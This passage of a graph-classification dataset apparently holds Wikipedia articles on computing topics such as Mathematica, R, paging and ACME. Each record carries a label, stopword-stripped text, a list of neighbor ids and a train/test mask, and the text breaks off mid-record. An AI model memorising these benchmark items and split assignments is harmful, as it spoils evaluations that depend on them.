    "text": "Knight_Tyme:knight tyme knight tyme computer game released zx spectrum amstrad cpc commodore 64 msx compatibles 1986 published mastertronic part mastertronic added dimension label two versions zx spectrum release published full version 128k spectrum published first cut-down version 48k spectrum removed music graphics locations published later programmed david jones third game magic knight series in-game music written david whittaker c64 version rob hubbard spectrum amstrad versions graphics ray owen rescued friend gimbal self-inflicted white-out spell magic knight finds transported far future aboard starship uss pisces magic knight must find way back time help tyme guardians apprehended paradox police board u.s.s pisces magic knight first recognized crew ship must create id card receives template derby iv ship main computer getting id completed takes command ship first arriving starbase 1 refuel ship refueling magic knight collects pieces golden sundial monopole retreat outpost returning ship pieces sundial discovers time machine appeared inside uss pisces take back time gameplay similar knight tyme predecessor spellbound game wide range commands carried-out using windimation system whereby text commands carried-out choosing options command windows importance watching magic knight energy level keeping harm rather different time around whilst spellbound required player vigilant health needed player occasionally avoid flying objects could sap strength knight tyme much focused puzzle-solving aspect although still death rooms spellbound reason regarded true graphic adventure gameworld features large number characters hero interact time around however responsible welfare help quest belong time magic knight found displaced person time around knight tyme also involves space travel magic knight commandeering uss pisces using journey various planets star systems planets communicated beamed-down via uss pisces transporter system magic knight also needs keep note ship fuel runs starship stranded means end game refuelling take place many planets uss pisces visits one magic knight game stormbringer released 1987",
    "neighbors": [
      11518,
      10931,
      9006,
      8823
    ],
    "mask": "Test"
  },
  {
    "node_id": 5829,
    "label": 3,
    "text": "NuMachine:numachine numachine nu machine early microprocessor-based computer workstation designed interface local area networks developed late 1970s mit laboratory computer science lcs professor steve ward research group concert western digital project included development trix unix operating system variant numachine first developed commercially western digital bought texas instruments 1983 texas instruments dropped numachine development 1985 favor ti explorer main legacy bus architecture called nubus later adopted apple computer macintosh ii next influenced design pci bus trix operating system used gnu project first attempt operating system kernel",
    "neighbors": [
      4741,
      5141,
      9686,
      377,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 5830,
    "label": 9,
    "text": "Wolfram_Mathematica:wolfram mathematica wolfram mathematica usually termed mathematica modern technical computing system spanning areas technical computing including neural networks machine learning image processing geometry data science visualizations others system used many technical scientific engineering mathematical computing fields conceived stephen wolfram developed wolfram research champaign illinois wolfram language programming language used mathematica features wolfram mathematica include wolfram mathematica split two parts kernel front end kernel interprets expressions wolfram language code returns result expressions front end designed theodore gray 1988 provides gui allows creation editing notebook documents containing program code prettyprinting formatted text together results including typeset mathematics graphics gui components tables sounds content formatting generated algorithmically edited interactively standard word processing capabilities supported including real-time multi-lingual spell-checking documents structured using hierarchy cells allow outlining sectioning document support automatic numbering index creation documents presented slideshow environment presentations notebooks contents represented mathematica expressions created modified analyzed mathematica programs converted formats front end includes development tools debugger input completion automatic syntax highlighting among alternative front ends wolfram workbench eclipse based integrated development environment ide introduced 2006 provides project-based code development tools mathematica including revision management debugging profiling testing plugin intellij idea based ides work wolfram language code addition syntax highlighting analyse auto-complete local variables defined functions mathematica kernel also includes command line front end interfaces include jmath based gnu readline wolframscript ref",
    "neighbors": [
      0,
      5129,
      15,
      1039,
      4623,
      5148,
      9248,
      5677,
      1591,
      6718,
      1087,
      10819,
      5703,
      2652,
      10848,
      100,
      2666,
      5741,
      2181,
      7301,
      6797,
      11406,
      7326,
      9376,
      7341,
      10413,
      9915,
      4797,
      2242,
      5319,
      4808,
      5833,
      8397,
      9944,
      219,
      1765,
      4840,
      2282,
      7924,
      8440,
      6408,
      7945,
      2317,
      7950,
      11538,
      11555,
      3876,
      10020,
      6962,
      823,
      1849,
      329,
      5450,
      847,
      8554,
      363,
      8046,
      3960,
      1923,
      8070,
      3980,
      8079,
      2457,
      7580,
      7069,
      7071,
      1443,
      5031,
      9133,
      8113,
      4019,
      7615,
      4042,
      2000,
      11219,
      10200,
      6629,
      11239,
      4074,
      5612,
      7148,
      3567,
      3573,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5831,
    "label": 3,
    "text": "Run_queue:run queue modern computers many processes run active processes placed array called run queue runqueue run queue may contain priority values process used scheduler determine process run next ensure program fair share resources one run time period quantum paused placed back run queue program stopped let another run program highest priority run queue allowed execute processes also removed run queue ask sleep waiting resource become available terminated linux operating system prior kernel 2.6.23 cpu system given run queue maintains active expired array processes array contains 140 one priority level pointers doubly linked lists turn reference processes given priority scheduler selects next process active array highest priority process quantum expires placed expired array priority active array contains processes scheduler swaps active expired arrays hence name 1 scheduler unix linux sar command used check run queue vmstat unix linux command also used determine number processes queued run waiting run appear r column two models run queues one assigns run queue physical processor one run queue system",
    "neighbors": [
      8036,
      7460,
      4423,
      823,
      5823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5832,
    "label": 7,
    "text": "HP_Converged_Systems:hp converged systems hp convergedsystem portfolio system-based products hewlett-packard hp integrates preconfigured components systems virtualization cloud computing big data collaboration converged management client virtualization composed servers storage networking integrated software services systems designed address cost complexity data center operations maintenance pulling components together single resource pool easier manage faster deploy previously would take three six months time order get system running reportedly takes 20 days hp convergedsystem hp convergedsystem uses common converged infrastructure architecture common foundation used hp server storage networking products hp converged infrastructure pools resources shared across different applications managed standardized management platform security software convergence server storage networking help user organizations save investment equipment maintenance management hp converged systems includes hp convergedsystem virtualization developing managing virtualized environments hp cloudsystem building managing cloud computing services across private public hybrid clouds hp convergedsystem big data loading analyzing managing vast quantities data hp convergedsystem collaboration configuration deployment microsoft unified communications software hp oneview converged infrastructure management hp convergedsystem client virtualization running virtual desktop infrastructure hp cloudsystem integrated cloud infrastructure delivering private public hybrid cloud services integrates hp cloud software hp servers storage networking technologies single system hp oneview converged infrastructure management product provides unified interface lets users automate formerly labor-intensive manual data center management maintenance tasks part software-defined data center hp convergedsystem virtualization consists series integrated server storage networking infrastructures offer scalability modular virtualization systems support 50 1,000 virtual machines hp convergedsystem 300 designed support 50 300 virtual machines comes configured hp proliant servers hp convergedsystem 700 designed larger enterprise installations 100 1,000 virtual machines comes configured hp bladesystem servers models customers choose vmware microsoft virtualization environments customers 700 model also install virtualization software models managed single console reported hp convergedsystem virtualization performs twice fast costs 25 percent less competing systems hp cloudsystem used enterprises service providers build manage private public hybrid cloud services system includes consumer-style user interface streamlined management tools based hp converged infrastructure hp cloudsystem modular infrastructure hp cloud service automation software cloudsystem integrates servers storage networking security management automate application infrastructure lifecycle service delivery via private hybrid clouds hp cloudsystem component hp converged cloud combines software cloud services unified set packages single unified architecture hp cloudsystem built hp cloud os features openstack technology enables users choose multiple hypervisors operating systems including microsoft vmware hp cloudsystem automatically shift workloads external clouds busy periods based pre-defined business policies supported public clouds include arsys sfr well amazon web services microsoft windows azure function commonly known cloud bursting hp cloudsystem lifecycle management tools automate process application provisioning customization configuration patch management retirement hp cloudsystem foundation features core components additional management capabilities simplified installation included hp cloudsystem enterprise hp convergedsystem big data provides workload-specific single-purpose systems support tasks performance critical data analytics data warehousing business applications software applications pre-integrated designed integrated hardware networking storage components hp convergedsystem 300 vertica designed businesses run hp vertica data analytics solution system works cloudera hortonworks mapr versions apache hadoop reported system operate 50 1,000 times faster competitors ’ data warehouse offerings hp convergedsystem 300 microsoft analytics platform system aps includes sql server parallel data warehouse pdw configured hdinsight hadoop nodes possible run polybase queries sql server pdw cloudera apache hortonworks hdp nodes hp convergedsystem 500 sap hana operates sap hana in-memory data management platform data analytics data warehousing reported system process data analytics twice fast competing systems sap hana hp convergedsystem 500 sap hana includes convergedsystem 500 hardware hp serviceguard sap hana data management tool protects unscheduled downtime providing capability automatic failover hp convergedsystem 500 sap hana enables users run data analytics enterprise resource planning erp workload-based system reported data analytics processes used take days weeks run accessed real-time hp convergedsystem 900 sap hana designed manage analyze large varied data sets reported hp convergedsystem 900 sap hana capable supplying 12 terabytes data one memory pool hp convergedsystem collaboration integrates hardware software services provide unified communications specific platforms pre-supplied workload configurations include hp collaboration solutions microsoft sharepoint server include hp sharepoint business decision business intelligence combines hp proliant gen8 servers sharepoint 2013 sql server ’ power view reported system takes less hour install launch hp convergedsystems solutions microsoft exchange server designed users deploy business email system modular simplified manner hp converged systems solutions microsoft lync server streamlines deployment microsoft lync communications voice instant messaging video includes reference architecture small medium enterprises hp oneview converged infrastructure management enables data center administrators perform automated lifecycle management hp servers part software-defined data center unlike legacy converged infrastructure management software focuses managing devices hp oneview designed help administrators enable tasks administrators view resources relationships visual map use representational state transfer rest application programming interface api automate system management tasks hp oneview interface modeled consumer applications efficiently manage hp bladesystem hp proliant generation 7 8 servers support hp moonshot arm servers planned reported hp oneview ’ deep knowledge servers hp virtual connect virtualization technology administrators deploy 16-node computer cluster 12 times faster could using manual operations administrators also use hp oneview provision maintain firmware across hp bladesystem enclosures servers virtual connect modules well manage virtual lan vlan network edge hp oneview plug-in vmware vcenter virtualization console enables administrators work directly vcenter console operations vmware vsphere hosts clusters managed automated reducing number steps takes carry tasks like setting new cluster hp convergedsystem 100 hosted desktops works software-defined hp moonshot m700 microserver systems includes software hardware services provide users environment running virtual desktops user gets dedicated cpu gpu removes need hypervisor according published reports moonshot server consumes 63 percent less power competing systems lower total cost ownership 44 percent compared standard desktop computer systems built joint effort amd citrix system reported provide graphics six times faster competing products client virtualization also provides way users securely access business applications data mobile devices",
    "neighbors": [
      4194,
      6153,
      6703,
      11030,
      7802,
      4604,
      1663
    ],
    "mask": "Test"
  },
  {
    "node_id": 5833,
    "label": 9,
    "text": "R_(programming_language):r programming language r programming language free software environment statistical computing graphics supported r foundation statistical computing r language widely used among statisticians data miners developing statistical software data analysis polls data mining surveys studies scholarly literature databases show substantial increases popularity r ranks 20th tiobe index measure popularity programming languages gnu package source code r software environment written primarily c fortran r freely available gnu general public license pre-compiled binary versions provided various operating systems although r command line interface several graphical user interfaces rstudio integrated development environment r implementation programming language combined lexical scoping semantics inspired scheme created john chambers 1976 bell labs important differences much code written runs unaltered r created ross ihaka robert gentleman university auckland new zealand currently developed r development core team chambers member r named partly first names first two r authors partly play name s. project conceived 1992 initial version released 1995 stable beta version 2000 r libraries implement wide variety statistical graphical techniques including linear nonlinear modelling classical statistical tests time-series analysis classification clustering others r easily extensible functions extensions r community noted active contributions terms packages many r standard functions written r makes easy users follow algorithmic choices made computationally intensive tasks c c++ fortran code linked called run time advanced users write c c++ java .net python code manipulate r objects directly r highly extensible use user-submitted packages specific functions specific areas study due heritage r stronger object-oriented programming facilities statistical computing languages extending r also eased lexical scoping rules another strength r static graphics produce publication-quality graphs including mathematical symbols dynamic interactive graphics available additional packages r rd latex-like documentation format used supply comprehensive documentation online number formats hard copy r interpreted language users typically access command-line interpreter user types codice_1 r command prompt presses enter computer replies 4 shown calculation interpreted sum two single-element vectors resulting single-element vector prefix codice_2 indicates list elements following line starts first element vector feature useful output extends multiple lines like similar languages apl matlab r supports matrix arithmetic r data structures include vectors matrices arrays data frames similar tables relational database lists arrays stored column-major order r extensible object system includes objects among others regression models time-series geo-spatial coordinates scalar data type never data structure r. instead scalar represented vector length one many features r derive scheme r uses s-expressions represent data code functions first-class manipulated way data objects facilitating meta-programming allow multiple dispatch variables r lexically scoped dynamically typed function arguments passed value lazy -- say evaluated used function called r supports procedural programming functions functions object-oriented programming generic functions generic function acts differently depending classes arguments passed words generic function dispatches function method specific class object example r generic codice_3 function print almost every class object r simple codice_4 syntax although used mainly statisticians practitioners requiring environment statistical computation software development r also operate general matrix calculation toolbox – performance benchmarks comparable gnu octave matlab capabilities r extended user-created packages allow specialised statistical techniques graphical devices import/export capabilities reporting tools rmarkdown knitr sweave etc packages developed primarily r sometimes java c c++ fortran r packaging system also used researchers create compendia organise research data code report files systematic way sharing public archiving core set packages included installation r 15,000 additional packages available comprehensive r archive network cran bioconductor omegahat github repositories task views page subject list cran website lists wide range tasks fields finance genetics high performance computing machine learning medical imaging social sciences spatial statistics r applied packages available r also identified fda suitable interpreting data clinical research r package resources include crantastic community site rating reviewing cran packages r-forge central platform collaborative development r packages r-related software projects r-forge also hosts many unpublished beta packages development versions cran packages bioconductor project provides r packages analysis genomic data includes object-oriented data-handling analysis tools data affymetrix cdna microarray next-generation high-throughput sequencing methods list changes r releases maintained various news files cran highlights listed several major releases specialized integrated development environment ide r rstudio similar development interface r tools visual studio generic ides like eclipse also offer features work r. graphical user interfaces point-and-click approach include rattle gui r commander rkward common editors varying levels support r include emacs emacs speaks statistics vim nvim-r plugin neovim nvim-r plugin kate lyx notepad++ visual studio code winedt tinn-r. r functionality accessible several scripting languages python perl ruby f julia interfaces high-level programming languages like java .net c available well main r implementation written r c fortran several implementations aimed improving speed increasing extensibility closely related implementation pqr pretty quick r radford m. neal improved memory management support automatic multithreading renjin fastr java implementations r use java virtual machine cxxr rho riposte implementations r c++ renjin riposte pqr attempt improve performance using multiple processor cores form deferred evaluation alternative implementations experimental incomplete relatively users compared main implementation maintained r development core team tibco built runtime engine called terr part spotfire microsoft r open fully compatible r distribution modifications multi-threaded computations r vibrant active local communities worldwide users network share ideas learn growing number r events bringing users together conferences e.g user whyr conectar satrdays meetups well r-ladies groups promote gender diversity official annual gathering r users called user first event user 2004 may 2004 vienna austria skipping 2005 user conference held annually usually alternating locations europe north america subsequent conferences included future conferences planned follows r journal open access refereed journal r project statistical computing features short medium length articles use development r including packages programming tips cran news foundation news r comparable popular commercial statistical packages sas spss stata r available users charge free software license january 2009 new york times ran article charting growth r reasons popularity among data scientists threat poses commercial statistical packages sas june 2017 data scientist robert muenchen published in-depth comparison r software packages popularity data science software although r open-source project supported community developing companies strive provide commercial support and/or extensions customers section gives examples companies 2007 richard schultz martin schultz steve weston kirk mettler founded revolution analytics provide commercial support revolution r distribution r also includes components developed company major additional components include parallelr r productivity environment ide revoscaler big data analysis revodeployr web services framework ability reading writing data sas file format revolution analytics also offer distribution r designed comply established iq/oq/pq criteria enables clients pharmaceutical sector validate installation revolution r. 2015 microsoft corporation completed acquisition revolution analytics since integrated r programming language sql server 2016 sql server 2017 power bi azure sql database azure cortana intelligence microsoft r server visual studio 2017 october 2011 oracle announced big data appliance integrates r apache hadoop oracle linux nosql database exadata hardware oracle r enterprise became one two components oracle advanced analytics option alongside oracle data mining ibm offers support in-hadoop execution r provides programming model massively parallel in-database analytics r. tibco offers runtime-version r part spotfire mango offers validation package r validr make compliant drug approval agencies like fda agencies allow use statistical software submissions software validated either vendor sponsor following examples illustrate basic syntax language use command-line interface r generally preferred assignment operator arrow made two characters codice_5 although codice_6 usually used instead one r ’ strengths ease creating new functions objects function body remain local function data type may returned example user-created function short r code calculating mandelbrot set first 20 iterations equation z z c plotted different complex constants c example demonstrates",
    "neighbors": [
      2050,
      1028,
      6664,
      5129,
      5130,
      6154,
      2062,
      15,
      6160,
      4628,
      5148,
      9245,
      3618,
      5677,
      2045,
      5684,
      1591,
      2556,
      6718,
      576,
      8258,
      10819,
      8262,
      5703,
      9286,
      10822,
      6228,
      1112,
      3674,
      2652,
      10848,
      10340,
      1130,
      7274,
      8810,
      5741,
      623,
      8304,
      6769,
      3705,
      11385,
      4604,
      7292,
      5759,
      9345,
      1668,
      2180,
      4230,
      5255,
      7301,
      1673,
      9865,
      6797,
      9871,
      9875,
      10387,
      5783,
      8349,
      7326,
      3744,
      8353,
      9893,
      4265,
      4777,
      7341,
      1203,
      692,
      7347,
      2233,
      7355,
      2242,
      6338,
      10435,
      5830,
      4808,
      10953,
      4302,
      207,
      7889,
      9944,
      7904,
      10464,
      228,
      10470,
      4840,
      2281,
      3817,
      10472,
      10478,
      10991,
      7924,
      8436,
      3323,
      6910,
      11009,
      7945,
      10506,
      2317,
      7950,
      10510,
      5395,
      1813,
      5403,
      2332,
      5917,
      10012,
      802,
      3876,
      6952,
      303,
      7983,
      6962,
      10043,
      5450,
      8524,
      847,
      5973,
      2903,
      8539,
      10083,
      8549,
      6502,
      8554,
      363,
      9579,
      1394,
      3960,
      9083,
      6016,
      3462,
      8582,
      6536,
      11654,
      2442,
      1931,
      3980,
      4493,
      8079,
      8082,
      1939,
      1429,
      2457,
      1435,
      7580,
      9631,
      11680,
      7076,
      5546,
      4011,
      428,
      9133,
      11180,
      2481,
      5555,
      4020,
      6074,
      9148,
      10687,
      963,
      8644,
      8139,
      2000,
      4561,
      8147,
      5588,
      11219,
      11221,
      2519,
      2010,
      4058,
      11226,
      477,
      9696,
      8673,
      11239,
      7147,
      5612,
      7148,
      1007,
      10737,
      2548,
      3573,
      6134,
      3068,
      2557
    ],
    "mask": "Test"
  },
  {
    "node_id": 5834,
    "label": 4,
    "text": "Automated_Certificate_Management_Environment:automated certificate management environment automatic certificate management environment acme protocol communications protocol automating interactions certificate authorities users web servers allowing automated deployment public key infrastructure low cost designed internet security research group isrg let encrypt service protocol based passing json-formatted messages https published internet standard rfc 8555 chartered ietf working group isrg provides free open-source reference implementations acme certbot python-based implementation server certificate management software using acme protocol boulder certificate authority implementation written go december 2015 web server caddy gained native support automatic certificate issuance renewal using acme protocol since spun go library called certmagic october 2017 let encrypt announced similar built-in functionality module apache httpd since large number client options appeared api v1 released april 12 2016 supports issuing certificates single domains example.com cluster.example.com let encrypt suggests users migrate v2 soon possible support v1 planned deprecated many acme clients already support v2 ahead release api v2 released march 13 2018 pushed back several times acme v2 backwards compatible v1 version 2 supports wildcard domains *.example.com allowing many subdomains trusted ssl e.g nowiki https //cluster01.example.com /nowiki nowiki https //cluster02.example.com /nowiki nowiki https //example.com /nowiki private networks single domain using single shared wildcard certificate major new requirement v2 requests wildcard certificates require modification domain name service txt record verifying control domain changes acme v2 protocol since v1 include",
    "neighbors": [
      513,
      517,
      1157,
      11653,
      1288,
      9744,
      1683,
      1688,
      1435,
      3742,
      419,
      2083,
      8358,
      8615,
      1836,
      11693,
      7985,
      9394,
      11569,
      7736,
      9281,
      10622,
      9412,
      3657,
      10831,
      11345,
      2003,
      11221,
      5590,
      474,
      3805,
      7264,
      8674,
      7139,
      10341,
      8554,
      2034,
      5107,
      501,
      1526,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 5835,
    "label": 4,
    "text": "DefenderMX:defendermx defendermx commercial linux based email security solution company founded 2002 company headquarters located washington dc usa company develops gateway hosted solutions built linux defendermx originally developed 2001 bains digital technologies fsl bains digital merged defendermx product merged barricademx plus line products fsl revived defendermx name next generation products based open source haraka project fsl major contributor defendermx uses following open source projects technologies",
    "neighbors": [
      8224,
      1409,
      4294,
      9222,
      914,
      2098,
      7347,
      9909,
      10906,
      6458,
      8539
    ],
    "mask": "Test"
  },
  {
    "node_id": 5836,
    "label": 1,
    "text": "Block_contention:block contention database management systems block contention data contention refers multiple processes instances competing access index data block time general caused frequent index table scans frequent updates concurrent statement executions two instances may also lead contention subsequently busy waiting process without lock situations goal spread queries greater number blocks avoid concentrating single one",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5837,
    "label": 9,
    "text": "Matthias_Felleisen:matthias felleisen matthias felleisen german-american computer science professor author grew germany immigrated us 21 years old felleisen currently trustee professor khoury college computer sciences northeastern university boston massachusetts past taught rice university receiving phd indiana university direction daniel p. friedman felleisen interests include programming languages including software tools program design design recipe software contracts many 1990s felleisen launched plt teachscheme programbydesign eventually giving rise bootstrap project goal teaching program-design principles beginners explore use scheme produce large systems part effort authored design programs mit press 2001 findler flatt krishnamurthi dissertation felleisen developed small-step operational semantics higher-order functional imperative extensions state control part semantics engineering plt redex derived dissertation well-known application proof type safety worked phd student andrew wright control delimiters basis delimited continuations introduced felleisen 1988 since used large number domains particularly defining new control operators see queinnec survey a-normal form anf intermediate representation programs functional compilers introduced sabry felleisen 1992 simpler alternative continuation-passing style cps felleisen gave keynote addresses 2011 technical symposium computer science education 2010 international conference functional programming 2004 european conference object-oriented programming 2001 symposium principles programming languages several conferences workshops computer science 2006 inducted fellow association computing machinery 2009 received karl v. karlstrom outstanding educator award acm 2010 received sigcse award outstanding contribution computer science education acm 2012 received acm sigplan programming languages achievement award significant lasting contribution field programming languages including small-step operational semantics control state mixin classes mixin modules fully abstract semantics sequential pcf web programming techniques higher-order contracts blame static typing dynamic languages felleisen co-author",
    "neighbors": [
      4992,
      10752,
      4867,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      10395,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      7734,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      10435,
      4550,
      7880,
      8908,
      1613,
      205,
      10703,
      11218,
      9299,
      9175,
      10712,
      3034,
      3675,
      219,
      4572,
      5852,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      1769,
      2666,
      3051,
      4846,
      6767,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 5838,
    "label": 7,
    "text": "Appian_Corporation:appian corporation appian corporation cloud computing company currently headquartered tysons corner virginia part dulles technology corridor appian sells platform service building enterprise software applications competes low-code development business process management case management markets appian named 2018 washington d.c. area top workplace washington post appian founded 1999 matthew calkins co-founders michael beckley marc wilson robert kramer 2001 appian developed army knowledge online time regarded “ world largest intranet 2004 appian released appian enterprise first business process management suite bpms software platform 2014 appian received 37.5 million secondary investments new enterprise associates 2016 appian ’ software platform evolved include broader aspects application development focus low-code development may 25 2017 appian became publicly-traded company trading symbol appn nasdaq global exchange 2018 appian announced move headquarters tysons virginia",
    "neighbors": [
      4042,
      4194
    ],
    "mask": "None"
  },
  {
    "node_id": 5839,
    "label": 3,
    "text": "Dynamite_Bowl:dynamite bowl general concept five players play 30 bowling lanes available simulating concept bowling league players change lane positioning determine strong throw even make ball go various curves even straight ball pins player character either male female options bowling ball weights ranging",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5840,
    "label": 2,
    "text": "Paging:paging computer operating systems paging memory management scheme computer stores retrieves data secondary storage use main memory scheme operating system retrieves data secondary storage same-size blocks called pages paging important part virtual memory implementations modern operating systems using secondary storage let programs exceed size available physical memory simplicity main memory called ram acronym random-access memory secondary storage called disk shorthand hard disk drive concepts depend whether terms apply literally specific computer system ferranti introduced paging atlas first mass market memory pages concepts computer architecture regardless whether page moved ram disk example pdp-8 7 instruction bits comprised memory address selected one 128 2 words zone memory called page use term rare 1960s swapping early virtual memory technique entire program would swapped rolled ram disk another one would swapped rolled swapped-out program would current execution would suspended ram use another program program might include multiple overlays occupy memory different times overlays method paging ram disk merely minimizing program use ram subsequent architectures used memory segmentation individual program segments became units exchanged disk ram segment program entire code segment data segment sometimes large data structures segments contiguous resident ram requiring additional computation movement remedy fragmentation invention page table let processor operate arbitrary pages anywhere ram seemingly contiguous logical address space pages became units exchanged disk ram process tries reference page currently present ram processor treats invalid memory reference page fault transfers control program operating system operating system must page frames use operating system must select page frame reuse page program needs evicted page frame dynamically allocated program hold data program modified since read ram words become dirty must written disk freed program later references evicted page another page fault occurs page must read back ram method operating system uses select page frame reuse page replacement algorithm important efficiency operating system predicts page frame least likely needed soon often least recently used lru algorithm algorithm based program working set increase responsiveness paging systems may predict pages needed soon preemptively loading ram program references completing initialization programs operate small number code data pages compared total memory program requires pages frequently accessed called working set working set small percentage system total number pages virtual memory systems work efficiently insignificant amount computing spent resolving page faults working set grows resolving page faults remains manageable growth reaches critical point faults go dramatically time spent resolving overwhelms time spent computing program written condition referred thrashing thrashing occurs program works huge data structures large working set causes continual page faults drastically slow system satisfying page faults may require freeing pages soon re-read disk thrashing also used contexts virtual memory systems example describe cache issues computing silly window syndrome networking worst case might occur vax processors single movl crossing page boundary could source operand using displacement deferred addressing mode longword containing operand address crosses page boundary destination operand using displacement deferred addressing mode longword containing operand address crosses page boundary source destination could cross page boundaries single instruction references ten pages ram cause page fault fault occurs operating system needs go extensive memory management routines perhaps causing multiple i/os might including writing process pages disk reading pages active process disk operating system could allocate ten pages program remedying page fault would discard another page instruction needs restart instruction would fault decrease excessive paging resolve thrashing problems user increase number pages available per program either running fewer programs concurrently increasing amount ram computer multi-programming multi-user environment many users may execute program written code data separate pages minimize use ram users share single copy program process page table set pages address code point single shared copy pages address data point different physical pages process different programs might also use libraries save space one copy shared library loaded physical memory programs use library virtual addresses map pages contain library code data programs want modify library code use copy-on-write memory allocated needed shared memory efficient way communication programs programs share pages memory write read exchange data first computer support paging supercomputer atlas jointly developed ferranti university manchester plessey 1963 machine associative content-addressable memory one entry 512 word page supervisor handled non-equivalence interruptions managed transfer pages core drum order provide one-level store programs paging feature microsoft windows since windows 3.0 1990 windows 3.x creates hidden file named 386spart.par win386.swp use swap file generally found root directory may appear elsewhere typically windows directory size depends much swap space system setting selected user control panel → enhanced virtual memory user moves deletes file blue screen appear next time windows started error message permanent swap file corrupt user prompted choose whether delete file whether exists windows 95 windows 98 windows use similar file settings located control panel → system → performance tab → virtual memory windows automatically sets size page file start 1.5× size physical memory expand 3× physical memory necessary user runs memory-intensive applications system low physical memory preferable manually set sizes value higher default file used paging windows nt family pagefile.sys default location page file root directory partition windows installed windows configured use free space available drives pagefiles required however boot partition i.e drive containing windows directory pagefile system configured write either kernel full memory dumps blue screen death windows uses paging file temporary storage memory dump system rebooted windows copies memory dump pagefile separate file frees space used pagefile default configuration windows pagefile allowed expand beyond initial allocation necessary happens gradually become heavily fragmented potentially cause performance problems common advice given avoid set single locked pagefile size windows expand however pagefile expands filled default configuration 150 total amount physical memory thus total demand pagefile-backed virtual memory must exceed 250 computer physical memory pagefile expand fragmentation pagefile occurs expands temporary soon expanded regions longer use next reboot sooner additional disk space allocations freed pagefile back original state locking pagefile size problematic windows application requests memory total size physical memory pagefile leading failed requests allocate memory may cause applications system processes fail also pagefile rarely read written sequential order performance advantage completely sequential page file minimal however large pagefile generally allows use memory-heavy applications penalties beside using disk space fragmented pagefile may issue fragmentation variable size page file time create number fragmented blocks drive causing files become fragmented reason fixed-size contiguous pagefile better providing size allocated large enough accommodate needs applications required disk space may easily allocated systems recent specifications i.e system 3 gb memory 6 gb fixed-size pagefile 750 gb disk drive system 6 gb memory 16 gb fixed-size pagefile 2 tb disk space examples system using 0.8 disk space pagefile pre-extended maximum defragmenting page file also occasionally recommended improve performance windows system chronically using much memory total physical memory view ignores fact aside temporary results expansion pagefile become fragmented time general performance concerns related pagefile access much effectively dealt adding physical memory unix systems unix-like operating systems use term swap describe act moving memory pages ram disk region disk pages stored systems common dedicate entire partition hard disk swapping partitions called swap partitions many systems entire hard drive dedicated swapping separate data drive containing swap partition hard drive dedicated swapping called swap drive scratch drive scratch disk systems support swapping swap partition others also support swapping files linux kernel supports virtually unlimited number swap backends devices files also supports assignment backend priorities kernel needs swap pages physical memory uses highest-priority backend available free space multiple swap backends assigned priority used round-robin fashion somewhat similar raid 0 storage layouts providing improved performance long underlying devices efficiently accessed parallel end-user perspective swap files versions 2.6.x later linux kernel virtually fast swap partitions limitation swap files contiguously allocated underlying file systems increase performance swap files kernel keeps map placed underlying devices accesses directly thus bypassing cache avoiding filesystem overhead regardless red hat recommends swap partitions used residing hdds rotational magnetic media devices one benefit using swap partitions ability place contiguous hdd areas provide higher data throughput faster seek time however administrative flexibility swap files outweigh certain advantages swap partitions example swap file placed mounted file system set desired size added changed needed swap partitions flexible enlarged without using partitioning volume management tools introduce various complexities potential downtimes swappiness linux kernel parameter controls relative weight given swapping runtime memory opposed dropping pages system page cache whenever memory allocation request met free memory swappiness set values 0 100 inclusive low value causes kernel prefer evict pages page cache higher value causes kernel prefer swap cold memory pages default value codice_1 setting higher increase overall throughput particularly disk io risk occasional high latency cold pages need swapped back setting lower even 0 may provide consistently low latency certainly default values work well workloads desktops interactive systems adequate ram expected task may want lower setting batch processing less interactive systems may want increase system memory highly insufficient current tasks large portion memory activity goes slow swap system become practically unable execute task even cpu idle every process waiting swap system considered swap death swap death happen due incorrectly configured memory overcommitment original description swapping death problem relates x server code data used x server respond keystroke main memory user enters keystroke server take one page faults requiring pages read swap keystroke processed slowing response pages n't remain memory faulted handle next keystroke making system practically unresponsive even actually executing tasks normally macos uses multiple swap files default apple-recommended installation places root partition though possible place instead separate partition device amigaos 4.0 introduced new system allocating ram defragmenting physical memory still uses flat shared address space defragmented based slab allocation method paging memory allows swapping paging implemented amigaos 4.1 may lock system physical memory used swap memory could activated deactivated moment allowing user choose use physical ram backing store virtual memory operating system typically many orders magnitude slower ram additionally using mechanical storage devices introduces delay several milliseconds hard disk therefore desirable reduce eliminate swapping practical operating systems offer settings influence kernel decisions many unix-like operating systems example aix linux solaris allow using multiple storage devices swap space parallel increase performance older virtual memory operating systems space swap backing store reserved programs allocate memory runtime data operating system vendors typically issue guidelines much swap space allocated paging one way allowing size addresses used process process virtual address space logical address space different amount main memory actually installed particular computer physical address space systems size process virtual address space much larger available main memory example computer true n -bit addressing may 2 addressable units ram installed example 32-bit x86 processor 4 gb without physical address extension pae case processor able address ram installed however even case paging used create virtual memory 4 gb instance many programs may running concurrently together may require 4 gb ram paging system makes efficient decisions memory relegate secondary storage leading best use installed ram although processor example address ram beyond 4 gb operating system may provide services programs envision larger memory files grow beyond limit installed ram operating system lets program manipulate data file arbitrarily using paging bring parts file ram necessary computers main memory larger virtual address space process magic-1 pdp-11 machines systems using 32-bit x86 processors physical address extension nullifies significant advantage virtual memory since single process use main memory amount virtual address space systems often use paging techniques obtain secondary benefits size cumulative total virtual address spaces still limited amount secondary storage available",
    "neighbors": [
      2560,
      1025,
      3586,
      5120,
      2571,
      6155,
      3603,
      6675,
      7187,
      10776,
      25,
      5146,
      8732,
      541,
      4637,
      3615,
      9762,
      4643,
      6180,
      5158,
      7728,
      7217,
      10803,
      4151,
      9784,
      10809,
      576,
      2625,
      6730,
      6221,
      4178,
      9300,
      86,
      10839,
      3160,
      6233,
      10333,
      7776,
      97,
      11363,
      2152,
      6760,
      8298,
      9835,
      10856,
      8301,
      7285,
      4727,
